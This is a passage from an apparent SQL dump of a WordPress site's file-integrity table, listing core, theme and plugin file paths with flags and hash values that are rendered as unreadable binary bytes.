F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�z�#�y:J�r���','wp-content/themes/travel-stories/images/strelka_left_light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���}\Z�6��1h�5','?�rg�-�(��!B�9NwBu�W�M��ϋ�','',0,'?'),('Z�ew�E��\\��\\F�+','wp-content/themes/advance/images/logosaf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���>3�� ���',']��<����$�E.��k2�:��\r�>','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z��9Sr�L�[XL�=c','wp-includes/wp-includes/session.php',0,'�NRM��<\\����>��','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','�� T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�}��z)�_{ K�','wp-content/themes/gambit/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�1�k�f��_�','H�3�1���ap�@ʡ�P �\0�����a�J�','',0,'?'),('Z�(�:a�� |�','wp-includes/wp-includes/js/thickbox/macFFBgHack.png',0,'�Ȱg�W�,/u�','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('Z�u=�7��0�','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�����y��','�+a�R�\"�͋kDxgd]��h���E�_#','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('Z��4Y+��96*�у','wp-includes/wp-includes/css/dist/block-library/style.css',0,'p>F��ő~���K��','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('[̉��$���\'��','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɚ�u\\ ���','c�V�����x�y(#il8L}e��','',0,'?'),('[�i������','wp-content/themes/Kent/content-single.php',0,'����x�x�mB�L','����x�x�mB�L','���gJk$7b�fM�Vp�>G�$�1IdIY�','',0,'?'),('[ؖ@г<�Āp&','wp-content/themes/promote/inc/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!G�r�v[�Z�l )�','s��@��#�h�rER0}�� A�1#Z��K�','',0,'?'),('[o�B�N\nۧ���','wp-content/themes/spidermag/spidermag/customwidget/widget-firstblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#o� a-���Q�3','���nl��p3��@&�Y14�}x���=\ZbR��!','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[\Z*:B��<u��}0','wp-includes/wp-includes/js/wp-emoji-loader.js',0,'�hn�1e��胖��S�','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[8�H����{��m<>�','wp-includes/wp-includes/js/tinymce/utils/mctabs.js',0,'끡�\"Y����>xU季','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('[P�@G].�&ag2!�Z','wp-content/themes/sg-window/img/icons/small/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v;1���t�^��=V','G:��R�5�6��%z_.�My�y!�P�ë�','',0,'?'),('[S��*<�,���','wp-content/themes/anima/resources/images/demo/5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��ǢO������1�','iV��G�9Y�\0�h�e�u\'����\'9�w�*��','',0,'?'),('[d6F\"\r�Ȁ�J��\r��','wp-content/themes/gambit/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xaͷ����I','�_o�����M\"��yi�����tU�@�','',0,'?'),('[n��0,n�|Jnw|/W ','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js',0,'��ώ�@�/@M�m�N�','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('[w�[ᄅ�\r |2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[�r�����,c[k','wp-content/themes/spidermag/assets/images/preloader/square.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��L��@\"�M��n','��+*Mՙu���õ���<��s\Zr�uc��','',0,'?'),('[�8}��\n��\rWԪ','wp-content/themes/skt-pathway/images/bull_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̑ZZ7�&�}6SjU&','�3[@t6�ꊔ8@&���\Z���9v��/�mVW�','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/�?n�.�EL�-��','t$�yC�\0.J���.�O��}��\"g�=�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[�d��0��� �G','wp-content/themes/Endolf/FT/options/banners.php',0,'_�}ӆ`��\\�K ','_�}ӆ`��\\�K ','�ʺ\r[E�J����CE].Ț\r�{�J=8\"�hL�','',0,'?'),('[��0>z�Q�A^)#��)','wp-content/themes/skt-pathway/images/transparent_black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OL��+���]��ur','�^F�օV��^B�tf`Y)��/XAH���ʹs���','',0,'?'),('[�U�$�&g|�t=Σ�G','wp-content/themes/advance/inc/widgets/advance_serviceblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��)�r��Դ\'','f��3�%H4��7N:�Z�8�<!�٘ɝ������','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��i���詿/�!','��(Y�E�U��<d�y���K 2�bsy�Z�L�','',0,'?'),('\\�>8��&;��~_�','wp-content/themes/wp-barrister/library/images/icon-tel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�)��u�z�?��','݇���#��s�AG��ɧ���D�\\��`�R','',0,'?'),('\\\r#��Mz�Ӯh&3��U','wp-content/themes/hueman/functions/init-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��G_{^�aW{���','��?���ԫ� ���T��꼡XIzl-��\n>','',0,'?'),('\\�\"��\n�Vg�u�5','wp-content/themes/capacious/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��x�ays������I','HcV����K��m:dH�a$0mѰ=��-�T','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!',' �H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\\Z3dh�EA��뫽�','wp-content/themes/newsmag/assets/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P��P��1��#���','�#̣s��\r����4F�[d��,?l�3','',0,'?'),('\\/ө��J|ǵKb�P','wp-content/themes/auberge/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����GE�y[Zb�','��#\Z|bghnėts�R\":�WkVۇ�}e�ܧKA','',0,'?'),('\\59\r�sSy9m�u4�','wp-content/themes/Endolf/js/custom.js',0,'��P���U�.���','��P���U�.���','yM0ظ�2��T�Z�w�\"8TH�1���','',0,'?'),('\\@jg��W�~x^%�t:','wp-content/themes/weblog/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Dy6\Zk�Ԧ6pm','�\"���P�UTY6���tͰi�|Ov=','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\`r�͉��&��rb�4','wp-content/themes/skt-pathway/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�sJ[W��/��JLi','Ԧ�7�R�VWY�wB��U$!����d&S�F��7','',0,'?'),('\\nF�Z�r��Z�\'\Z�','wp-content/themes/gambit/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{zN:!�aԉю� �\0','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('\\z �k-5rY\'iZkS','wp-content/themes/hueman/assets/front/img/demo/1-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������)O�_�','�b=C5�X&�[+�t&Vա�L��sr�pHP#�\n','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\������}�o','wp-content/themes/hueman/functions/class-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y7cB��~���','9��Č�W�1Is�!� �zۨ�}�e0:$s��','',0,'?'),('\\��s1��M� ��','wp-includes/wp-includes/Requests/Exception/HTTP/403.php',0,'��`�\r�o��k3��1�','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ê��m\Z�E��Y��.','&����3��eſ�.��(���{��T�Cv.','',0,'?'),('\\���f��S��\0U�d','wp-content/themes/Endolf/page.php',0,'EL)@�P��b�jzʳ�','EL)@�P��b�jzʳ�','����Ǽ=qPҧh�!�P��S�W�Ѵ�','',0,'?'),('\\��u�]�A%� �','wp-content/themes/twentytwenty/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�*����� ','4\nO�ҩ��i����;Vt6\'�@1I�ȋ�W','',0,'?'),('\\���9I���Ow��','wp-content/themes/vision-lite/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{i� �B����`','\n\r�k:�q7J��uG�zRowUl��lh','',0,'?'),('\\�b@B�wv:�,�W','wp-content/themes/newsmag/assets/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z���KW�m�ϖ3Q','9;��r�Ⱦc��\n ��j�k�\r_)�\0','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\ֶ�S��\n��P�:�','wp-content/themes/twentynineteen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��8v�D����','�N�1����1�swR�������������','',0,'?'),('\\��]�ZF�y\n��\n!��','wp-content/themes/promote/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),(']-MUTH��M�ݬ��a','wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column_featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zʶ��xO�؉\n$���','ꃭ����;�S� ��V��`�p�e�R�B','',0,'?'),(']�����h���','wp-content/themes/promote/inc/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<.�t]E� �\'6���c','���&ֻ�j��3%k�\"\Z�� ����z�g�','',0,'?'),(']%(��\n�rL�*Բ�g','wp-content/themes/promote/parts/part-counter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9C��%��&�j�w^U�','���V��4/���%�Q�Q[E���ڡ�MzM��','',0,'?'),(']�_E6��� �U��A','wp-content/themes/event/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$�*����3���','�Q_�� �\'J���H\'����%]�d��� e','',0,'?'),(']&��A��!�S�K>�','wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�*���|).��h','��Q�-:�ñ��1Z��ŴCxʞ�dd;Z�b�^','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),(']1���ZCEg#!�<(','wp-includes/wp-includes/ms-default-filters.php',0,'l�����n����','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),(']9.�pe���T���','wp-content/themes/twentynineteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'&iɴ�G��x��Rl:','�JÂ���W�S��\"�V�JZɌM�ڛ�D','',0,'?'),(']9OUâ��\n��V','wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),(']?�v$5:th����xL','wp-content/themes/vision-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B^Ȕ\\�5�k�)���','��Zd��[FX������2@\0R�rX�z��~','',0,'?'),(']@$���ɩ��&h��y�','wp-includes/wp-includes/Requests/Response.php',0,'�p����R櫷�\'G','�p����R櫷�\'G','����WwYKL\n�� -*���^e\"e�(_,g','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']]�cy�v�T�\"J&�','wp-content/themes/event/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�����P��}+ٞ','G��O�E����ԩb��h��d�G^��3~�','',0,'?'),(']_Z��oɈF<�o~\0n�','wp-content/themes/spidermag/spidermag/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�Yb�P�J~%��6','�J:�*�!�8������#݅�6|�h&','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']����ΰ��m','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������j�^��!��','��)秐=�l2^m�\r���uV20�ژM{�','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),(']���CU�a��/B�','wp-content/themes/pine/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LN��G;6J{� J�','��� +�fG���~u�ܿ;��}O[�������','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']�_�.L�\"ʆI��I^�','wp-content/themes/promote/inc/kirki/assets/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r���s�)g?','sj�� 6��V`f�\'jҧ��� �~I�nR','',0,'?'),(']�J��f��Dx/$l�','wp-includes/wp-includes/Requests/Exception/HTTP/410.php',0,'q�O47ߺݥ/8X!��','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H7g���8Y�y�','��Ϛ����Z:��J�Dz��#y04�?','',0,'?'),(']�� \0�w�� h��','wp-content/themes/sg-window/img/icons/friendster.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uٰ��\"��@=A','��w��Ra\Z��Ub.��\n�a�5?��1$oF.�&','',0,'?'),(']�~t��j�@���u��','wp-includes/wp-includes/images/media/interactive.png',0,'R˂���ôʼnh�H','R˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),(']�n��*ʓ�o�N)��','wp-content/themes/promote/js/unminified/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��zεL��F!�`�4\n','g₱S��V�DD�$Z[�V�0�����|�}B�X','',0,'?'),(']��5ҰW�� ','wp-includes/wp-includes/js/dist/vendor/react-dom.min.js',0,'�c�JeN���uL��','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),(']�I\'ohuĕ��6�� ','wp-content/themes/promote/inc/kirki/includes/class-kirki-toolkit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=+T\Z�5ecؐH��','�Oo�P6�:|5/M�_�6#.y�Ύ�y(���','',0,'?'),(']���S���FG�J','wp-content/themes/capacious/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ă�����6cKe���','�\ZC�m���E�{�T��%\"�9��VeV#`�','',0,'?'),(']�??仈hD,�+ Z��','wp-content/themes/hueman/assets/admin/img/col-3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�Ya%��@nk�%̩b�','!�y/�$�L�G�h$�}Y�k1��ZV�','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),(']��I�..���_��','wp-content/themes/spidermag/spidermag/customwidget/widget-eightblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kJړ�`��5���Y','́FO\0�ȊP|m�[��K�I�o���;i','',0,'?'),('^E0\'��`n`H��\Z','wp-content/themes/spidermag/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�`� z�@��d�6�$8','l�3�6�nW�z�ѪjBh�3Kg�e���','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^(�?�t�p���,$�','wp-includes/block-patterns/large-header-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('^)�r\"ZυPT�:���','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NO�.��e�2 a���','��H�Χb\\/�q@����A�RR\"\"�p�!>��','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^Oţu��\Z�\r>Pq*�Z','wp-content/themes/anima/resources/images/demo/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�ކR��?l��z�i�U','6�(���a�V};#�d��F�k��,�ҷ�','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^^�L���y$��B�n','wp-includes/wp-includes/blocks/text-columns/block.json',0,'�?�ȴ����Y͆ ','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^��.�x�\\k8Ł]�nz','wp-content/themes/newsmag/inc/notify-system-checks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���U�\Z�:�7۫+!','��xi<�S(_��6F��5t�jܽ�1��D�','',0,'?'),('^�O���̳�d����','wp-content/themes/hueman/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���R���/(or�b','�p��@��C�%�ŗ\"��9�\">ִ�/','',0,'?'),('^�J����n��\0p','wp-content/themes/mora/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0��T�y���3L','�-�T�]��j�o���1�v̲��.���NJ�','',0,'?'),('^�+l=�Ubo�(j','wp-includes/wp-includes/js/wpdialog.min.js',0,'=nR�-��KP��=��<','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('^��2�7}�����I��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь�����{�O�','vZ���d¥���bNpz04\\��\ZL��I��v�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^ǿ��+C%K��x�','wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� ,��*]�1�n','���0CfIΰa����BqG�8��O�u>�Wþ','',0,'?'),('^����JA�m�b�','wp-content/themes/sg-window/page-templates/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�ٜcz�h2����','�� �qP��o�xۛ�f�92}��f�sK�','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('^�ԭ��a��[�$ۃÙ','wp-content/themes/anima/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�\"�g����{(&((�','K0��\\� ��9S@��ژ5lЛ)���-���','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5 ��O?','�@!�`C��*Me��z�j@ 